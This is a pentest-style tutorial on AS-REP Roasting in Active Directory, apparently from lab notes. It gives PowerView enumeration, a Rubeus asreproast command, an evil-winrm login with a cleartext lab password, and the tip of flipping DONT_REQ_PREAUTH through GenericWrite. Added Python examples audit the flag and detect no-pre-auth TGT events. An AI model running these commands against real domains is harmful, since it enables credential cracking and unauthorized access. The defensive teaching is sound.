AS-REP Roasting

If we can identify valid usernames on the domain (using Kerbrute, for example), we can check whether any of those users are vulnerable to AS-REP Roasting. Occasionally an account is configured so that Kerberos pre-authentication is not required; this is not very common, but it happens. If pre-authentication is not required, it is possible to request a Ticket Granting Ticket (TGT) as that user without performing any pre-authentication.

AS-REP Roasting can be done from Linux or from a domain-joined Windows machine.

Enumeration

List all users that have the DONT_REQ_PREAUTH setting enabled (the userAccountControl flag that turns off Kerberos pre-authentication for the account):

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

If we have GenericWrite or GenericAll on a domain account, we can set the DONT_REQ_PREAUTH flag on that account ourselves and then request a TGT for that user.
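The two paragraphs above both come down to the same attribute: an account is roastable when the DONT_REQ_PREAUTH bit is set in its userAccountControl, whether it was configured that way or set later by someone with write access. The following is an added example (not code from the original page) that decodes that bitmask the way Get-DomainUser -PreauthNotRequired does and lists the enabled accounts affected, which is the check a defender runs when auditing the domain. The user records are constructed inline; in practice they would come from an LDAP query for the userAccountControl attribute.

```python
# Added example: audit userAccountControl values for the DONT_REQ_PREAUTH flag.
# Input records are constructed here; a real audit would pull the
# userAccountControl attribute for every user object over LDAP.

# Bit values of userAccountControl (documented in MS-ADTS); only those used here.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}
DONT_REQ_PREAUTH = 0x400000
ACCOUNTDISABLE = 0x0002


def decode_uac(value: int) -> list[str]:
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for bit, name in UAC_FLAGS.items() if value & bit]


def preauth_not_required(users):
    """Return (sAMAccountName, flag names) for enabled accounts with DONT_REQ_PREAUTH set.

    Disabled accounts are skipped: the KDC will not issue them a TGT, so they
    cannot be roasted, although re-enabling them would make them a finding.
    """
    findings = []
    for u in users:
        uac = u["userAccountControl"]
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            findings.append((u["sAMAccountName"], decode_uac(uac)))
    return findings


# Constructed sample records (same attributes the PowerView command selects).
SAMPLE_USERS = [
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x400200},  # NORMAL_ACCOUNT | DONT_REQ_PREAUTH
    {"sAMAccountName": "jdoe", "userAccountControl": 0x200},           # normal account, pre-auth required
    {"sAMAccountName": "old_svc", "userAccountControl": 0x400202},     # flag set but account disabled -> skipped
    {"sAMAccountName": "svc_web", "userAccountControl": 0x410200},     # DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH
]

if __name__ == "__main__":
    for name, flags in preauth_not_required(SAMPLE_USERS):
        print(f"{name}: {' | '.join(flags)}")
```

Any account this reports should either have the flag cleared or, if a legacy application genuinely needs it, be given a long random password so the AS-REP cannot be cracked. Because the flag can be toggled by anyone with write access to the object, the same check is worth re-running on a schedule rather than once.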

If we get hashes, we can crack them using john or hashcat. See the hashcat section.

Once a hash is cracked, we can try to log in using evil-winrm or psexec.py to gain a foothold on the target system.

evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23

Rubeus

Locally from the target system (a domain-joined Windows machine), we can perform AS-REP roasting with the following Rubeus command:

PS C:\htb> .\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat
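Whether the request above is made with Rubeus on a domain-joined host or from Linux, the domain controller records it the same way: a successful Kerberos Authentication Service event (4768) whose Pre-Authentication Type is 0, because no pre-authentication was performed. The following is an added example (not code from the original page) of the triage logic a defender would run over those events; it treats an RC4 ticket encryption type (0x17) as a stronger signal, since that is the cheaper-to-crack format the /format:hashcat workflow targets. The log lines are constructed and flattened to key="value" form for the example; a real pipeline would read the 4768 event fields from the Security log or a SIEM.

```python
# Added example: flag Kerberos TGT requests that were granted without
# pre-authentication. In Windows Security event 4768, PreAuthType 0 with
# Status 0x0 means the KDC issued a TGT for an account that did not have to
# pre-authenticate, which is exactly what AS-REP roasting produces.
# The sample log lines are constructed for this example.
import re

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')


def parse_event(line: str) -> dict:
    """Parse one flattened key="value" event line into a dict."""
    return dict(FIELD_RE.findall(line))


def is_roast_candidate(ev: dict) -> bool:
    """True for a successful 4768 in which no pre-authentication took place."""
    return (ev.get("EventID") == "4768"
            and ev.get("Status") == "0x0"
            and ev.get("PreAuthType") == "0")


def triage(lines):
    """Return (account, client address, severity) for every matching event.

    RC4 (0x17) as the ticket encryption type is rated higher because the
    resulting AS-REP is far cheaper to crack offline than an AES (0x11/0x12) one.
    """
    hits = []
    for line in lines:
        ev = parse_event(line)
        if not is_roast_candidate(ev):
            continue
        severity = "high" if ev.get("TicketEncryptionType") == "0x17" else "medium"
        hits.append((ev.get("TargetUserName"), ev.get("IpAddress"), severity))
    return hits


# Constructed sample events: one normal logon (PreAuthType 2 = encrypted
# timestamp), two no-pre-auth TGTs, and a failed pre-auth (4771) that must not match.
SAMPLE_LOG = [
    'EventID="4768" TargetUserName="jdoe" IpAddress="::ffff:10.10.14.5" Status="0x0" PreAuthType="2" TicketEncryptionType="0x12"',
    'EventID="4768" TargetUserName="svc_backup" IpAddress="::ffff:10.10.14.5" Status="0x0" PreAuthType="0" TicketEncryptionType="0x17"',
    'EventID="4768" TargetUserName="svc_web" IpAddress="::ffff:10.10.14.5" Status="0x0" PreAuthType="0" TicketEncryptionType="0x12"',
    'EventID="4771" TargetUserName="jdoe" IpAddress="::ffff:10.10.14.5" Status="0x18" PreAuthType="2"',
]

if __name__ == "__main__":
    for account, source, severity in triage(SAMPLE_LOG):
        print(f"[{severity}] no-preauth TGT for {account} from {source}")
```

A single no-pre-auth TGT for a known legacy service account may be expected, so the alert is best correlated with the audit of which accounts carry DONT_REQ_PREAUTH: a match for an account that should not have the flag, or several different accounts hit from one client address in a short window, is the pattern worth escalating.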
